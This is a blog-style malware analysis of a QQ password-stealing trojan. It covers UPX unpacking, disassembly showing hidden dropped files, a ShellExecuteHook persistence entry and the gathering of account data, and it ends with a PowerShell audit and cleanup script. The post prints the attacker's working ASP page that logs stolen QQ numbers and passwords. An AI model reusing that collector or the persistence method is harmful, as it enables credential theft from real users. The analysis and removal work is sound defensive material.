I read the official notice from Hacker Defense (黑客防线): in the "Feature of the Month" column on the issue 6 CD, the tool bundled with the DVBBS (动网) exploit walkthrough video sets off antivirus alerts, flagged as Trojan-PSW.Win32.QQShou.ed. I thought: I, Old Demon (老魔), already count as fairly black-hat, and here is someone blacker still. The student outdoes the master... So I took this malicious program apart, partly to sharpen my own manual-analysis skills and partly to help friends who picked up the trojan clean it out completely.
First, check the packer with PEiD: UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay]. There are countless UPX unpackers online, but I won't bother downloading one; PEiD's UPX FILEINFO plugin hands you the OEP of a UPX-packed program directly.
Here the OEP is 4056D8. Load the file in OllyDbg (OD), press F4 to run to 4056D8 and dump it; that is the unpacking done. Another PEiD check on the dump says Borland Delphi 6.0 - 7.0. Whether you bother repairing the import table after unpacking is up to you; we are not going to run it anyway.
Load the unpacked program in OD and let's analyze it.
00404935 50 PUSH EAX
00404936 E8 71FCFFFF CALL <JMP.&kernel32.GetSystemDirectoryA> // returns the Windows system directory path
0040493B 85C0 TEST EAX,EAX
0040493D 75 07 JNZ SHORT 2.00404946
0040493F C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43
00404946 8A85 00FFFFFF MOV AL,BYTE PTR SS:[EBP-100]
0040494C 50 PUSH EAX
0040494D E8 E2FCFFFF CALL <JMP.&USER32.IsCharAlphaA> // checks whether the first character (the drive letter) is alphabetic
00404952 83F8 01 CMP EAX,1
00404955 1BC0 SBB EAX,EAX
00404957 40 INC EAX
00404958 84C0 TEST AL,AL
0040495A 75 07 JNZ SHORT 2.00404963
0040495C C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43 // Hex 43 = 'C': falls back to drive C~~
00404963 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404969 8A95 00FFFFFF MOV DL,BYTE PTR SS:[EBP-100]
0040496F E8 CCEDFFFF CALL 2.00403740
00404974 8B95 FCFEFFFF MOV EDX,DWORD PTR SS:[EBP-104]
0040497A 8BC3 MOV EAX,EBX
0040497C B9 B4494000 MOV ECX,2.004049B4 ; :\program files\internet explorer\plugins\
00404981 E8 2EEEFFFF CALL 2.004037B4
00404986 33C0 XOR EAX,EAX
00404988 5A POP EDX
00404989 59 POP ECX
0040498A 59 POP ECX
Once the program runs, it first creates files on the drive that holds the system directory (the drive letter is taken from GetSystemDirectoryA above, falling back to C:), at this path:
C:\Program Files\Internet Explorer\PLUGINS\
Go there and you'll find two new files: bow.sys, a dynamic-link library, and bow.bak. How do you tell they were dropped by the trojan? Look at the files' creation dates and it becomes obvious.
Note that these files are hidden; you must enable "show all files" to see them.
Now let's look at the contents of bow.sys in OD:
003E4E1A |. 50 PUSH EAX /pDisposition
003E4E1B |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] ; |
003E4E1F |. 50 PUSH EAX ; |pHandle
003E4E20 |. 6A 00 PUSH 0 ; |pSecurity = NULL
003E4E22 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00 PUSH 0 ; |Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00 PUSH 0 ; |Class = NULL
003E4E2B |. 6A 00 PUSH 0 ; |Reserved = 0
003E4E2D |. 68 744E3E00 PUSH bow.003E4E74 ; |software\ms\qqguishou
003E4E32 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF CALL <JMP.&advapi32.RegCreateKeyExA> ; \RegCreateKeyExA
It writes to the registry: HKEY_CURRENT_USER\Software\Ms\QQGuiShou
Is "QQGuiShou" the pinyin for "QQ鬼手" (QQ Ghost Hand)? According to Google, a QQ-stealing tool by that name does indeed exist.
Continuing the analysis:
:00407715 A124A14000 mov eax, dword ptr [0040A124]
:0040771A 8B4018 mov eax, dword ptr [eax+18]
:0040771D 50 push eax
:0040771E A124A14000 mov eax, dword ptr [0040A124]
:00407723 8B4014 mov eax, dword ptr [eax+14]
:00407726 50 push eax
* Possible StringData Ref from Code Obj ->"QQ冲击波给你送礼物啦-->("
:00407727 68947A4000 push 00407A94
:0040772C FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->"----"
:0040772F 68B87A4000 push 00407AB8
:00407734 FF75F4 push [ebp-0C]
:00407737 68C87A4000 push 00407AC8
:0040773C 8D45CC lea eax, dword ptr [ebp-34]
:0040773F BA05000000 mov edx, 00000005
:00407744 E853BDFFFF call 0040349C
:00407749 8B45CC mov eax, dword ptr [ebp-34]
:0040774C 50 push eax
* Possible StringData Ref from Code Obj ->" 号码:"
:0040774D 68D47A4000 push 00407AD4
:00407752 FF75F8 push [ebp-08]
* Possible StringData Ref from Code Obj ->" ----密码:"
:00407755 68E47A4000 push 00407AE4
:0040775A FF75F4 push [ebp-0C]
* Possible StringData Ref from Code Obj ->" ----可用游戏币:"
:0040775D 68F87A4000 push 00407AF8
:00407762 8D55C4 lea edx, dword ptr [ebp-3C]
:00407765 8B45DC mov eax, dword ptr [ebp-24]
:00407768 E8E7D7FFFF call 00404F54
:0040776D FF75C4 push [ebp-3C]
* Possible StringData Ref from Code Obj ->" ----保存的:"
:00407770 68147B4000 push 00407B14
:00407775 8D55C0 lea edx, dword ptr [ebp-40]
:00407778 8B45E0 mov eax, dword ptr [ebp-20]
:0040777B E8D4D7FFFF call 00404F54
:00407780 FF75C0 push [ebp-40]
* Possible StringData Ref from Code Obj ->" ----积分:"
:00407783 682C7B4000 push 00407B2C
:00407788 8D55BC lea edx, dword ptr [ebp-44]
:0040778B 8B45EC mov eax, dword ptr [ebp-14]
:0040778E E8C1D7FFFF call 00404F54
:00407793 FF75BC push [ebp-44]
* Possible StringData Ref from Code Obj ->" ----是否是会员:"
:00407796 68407B4000 push 00407B40
:0040779B 8D55B8 lea edx, dword ptr [ebp-48]
:0040779E 8B45D4 mov eax, dword ptr [ebp-2C]
:004077A1 E8AED7FFFF call 00404F54
:004077A6 FF75B8 push [ebp-48]
* Possible StringData Ref from Code Obj ->" ----等级:"
|
:004077A9 685C7B4000 push 00407B5C
:004077AE 8D55B4 lea edx, dword ptr [ebp-4C]
:004077B1 8B45D0 mov eax, dword ptr [ebp-30]
:004077B4 E89BD7FFFF call 00404F54
:004077B9 FF75B4 push [ebp-4C]
* Possible StringData Ref from Code Obj ->" ----游戏点:"
|
:004077BC 68707B4000 push 00407B70
:004077C1 8D55B0 lea edx, dword ptr [ebp-50]
:004077C4 8B45E4 mov eax, dword ptr [ebp-1C]
:004077C7 E888D7FFFF call 00404F54
:004077CC FF75B0 push [ebp-50]
* Possible StringData Ref from Code Obj ->" ----IP: "
"QQ Shockwave brings you a gift!" Some gift indeed. After querying the QQ site, it gift-wraps all of your QQ details: number, password, available game coins, membership status, points, level, game points and IP, and sends them off. It writes its own .sys into this as well, plus the configuration data appended to the end of the program.
Sigh, trojans these days just keep getting better... The data is submitted by POST to an ASP web page, which saves the received passwords. Anyone interested can capture a packet and have a look; I'm not going to rob someone else of the fruits of their labour here. The password-receiving ASP code is as follows:
<%
LogFile="log.txt"
LogFileGB="LOGGB.txt"
QQNumber=request("Number")
QQPassWord=request("PassWord")
QQGBA=request("yxba")
QQGBB=request("yxbb")
if QQGBA="" then
QQGBA="no"
end if
if QQGBB="" then
QQGBB="no"
end if
LogText=QQNumber&"----"&QQPassWord
LogTextGB=QQNumber&"----"&QQPassWord &"----QQGBA:"& QQGBA&"----QQGBB:"& QQGBB
set f=Server.CreateObject("scripting.filesystemobject")
set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)
ff.writeline(LogText)
ff.close
set ff=nothing
set f=nothing
set f1=Server.CreateObject("scripting.filesystemobject")
set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)
ff1.writeline(LogTextGB)
ff1.close
set ff1=nothing
set f1=nothing
%>
00404AFB 55 PUSH EBP
00404AFC 68 A04B4000 PUSH 2.00404BA0
00404B01 64:FF30 PUSH DWORD PTR FS:[EAX]
00404B04 64:8920 MOV DWORD PTR FS:[EAX],ESP
00404B07 68 AC4B4000 PUSH 2.00404BAC
00404B0C B9 B04B4000 MOV ECX,2.00404BB0 ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B11 BA D84B4000 MOV EDX,2.00404BD8 ; software\microsoft\windows\currentversion\explorer\shellexecutehooks
00404B16 B8 02000080 MOV EAX,80000002
00404B1B E8 70FFFFFF CALL 2.00404A90
00404B20 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B23 BA 284C4000 MOV EDX,2.00404C28 ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}
00404B28 E8 8BEBFFFF CALL 2.004036B8
00404B2D 68 AC4B4000 PUSH 2.00404BAC
00404B32 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
00404B35 E8 1EEEFFFF CALL 2.00403958
00404B3A 8BD0 MOV EDX,EAX
00404B3C B9 AC4B4000 MOV ECX,2.00404BAC
00404B41 B8 00000080 MOV EAX,80000000
00404B46 E8 45FFFFFF CALL 2.00404A90
00404B4B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00404B4E BA 604C4000 MOV EDX,2.00404C60 ; \inprocserver32apartment
00404B53 E8 18ECFFFF CALL 2.00403770
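The listing above registers the hook DLL as a ShellExecuteHook under the CLSID {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}; together with the dropped bow.sys/bow.bak files and the HKCU\Software\Ms\QQGuiShou key seen earlier, that gives a complete set of artifacts to check a machine for. The following PowerShell script is an example added to this article, not code from the original post or from the trojan: it audits a machine for exactly those artifacts and, with -Remove, cleans them up. The file paths, key names and CLSID are taken from the listings above; the function name Add-Finding, the -Remove switch and the order of the cleanup steps are this example's own assumptions.

```powershell
# Added example (not from the original article): audit, and optionally remove, the
# artifacts the article attributes to Trojan-PSW.Win32.QQShou.ed.
# Paths, key names and the CLSID come from the disassembly listings; everything else
# (Add-Finding, -Remove, cleanup order) is an assumption of this example.
param([switch]$Remove)

$Clsid     = '{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}'
$HooksKey  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks'
$ClsidKey  = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
$ConfigKey = 'HKCU:\Software\Ms\QQGuiShou'

# The dropper builds the path from the drive letter of the system directory
# (the GetSystemDirectoryA sequence above), so derive it the same way rather than assuming C:.
$SysDrive  = [System.IO.Path]::GetPathRoot([Environment]::SystemDirectory)   # e.g. "C:\"
$PluginDir = Join-Path $SysDrive 'Program Files\Internet Explorer\PLUGINS'
$DropFiles = @('bow.sys', 'bow.bak') | ForEach-Object { Join-Path $PluginDir $_ }

$Findings = New-Object System.Collections.Generic.List[object]

function Add-Finding([string]$Kind, [string]$Where, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Kind = $Kind; Where = $Where; Detail = $Detail })
}

# 1. Dropped files. They carry the Hidden attribute, so Get-Item needs -Force.
foreach ($path in $DropFiles) {
    $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
    if ($item) {
        Add-Finding 'File' $path "attrs=$($item.Attributes) created=$($item.CreationTime)"
    }
}

# 2. ShellExecuteHooks value named after the CLSID: this is what makes Explorer load the DLL.
$hook = Get-ItemProperty -Path $HooksKey -Name $Clsid -ErrorAction SilentlyContinue
if ($hook) { Add-Finding 'Registry value' "$HooksKey\$Clsid" 'ShellExecuteHooks entry' }

# 3. COM registration of the hook; the InprocServer32 default value names the DLL on disk.
$server = Get-ItemProperty -Path "$ClsidKey\InprocServer32" -ErrorAction SilentlyContinue
if ($server) {
    Add-Finding 'Registry key' $ClsidKey "InprocServer32=$($server.'(default)')"
} elseif (Test-Path $ClsidKey) {
    Add-Finding 'Registry key' $ClsidKey 'CLSID key present (no InprocServer32 subkey)'
}

# 4. The trojan's own configuration key written by bow.sys.
if (Test-Path $ConfigKey) { Add-Finding 'Registry key' $ConfigKey 'QQGuiShou configuration' }

if ($Findings.Count -eq 0) { Write-Host 'No QQShou artifacts found.'; return }
$Findings | Format-Table -AutoSize

if ($Remove) {
    # Unhook first so Explorer stops loading the DLL, then drop the COM registration and
    # the config key, and finally the files. A DLL that is still mapped into explorer.exe
    # cannot be deleted; restart Explorer (or reboot) and run the script again if that fails.
    Remove-ItemProperty -Path $HooksKey -Name $Clsid -ErrorAction SilentlyContinue
    Remove-Item -Path $ClsidKey, $ConfigKey -Recurse -Force -ErrorAction SilentlyContinue
    foreach ($path in $DropFiles) {
        if (Test-Path -LiteralPath $path) {
            try   { Remove-Item -LiteralPath $path -Force -ErrorAction Stop }
            catch { Write-Warning "Could not delete $path ($($_.Exception.Message)); retry after restarting Explorer." }
        }
    }
}
```

Run it from an elevated PowerShell prompt, since the HKLM and HKCR keys need administrator rights; without -Remove it only reports. The ShellExecuteHooks value is removed before the file, because otherwise Explorer would simply reload bow.sys on the next ShellExecute call.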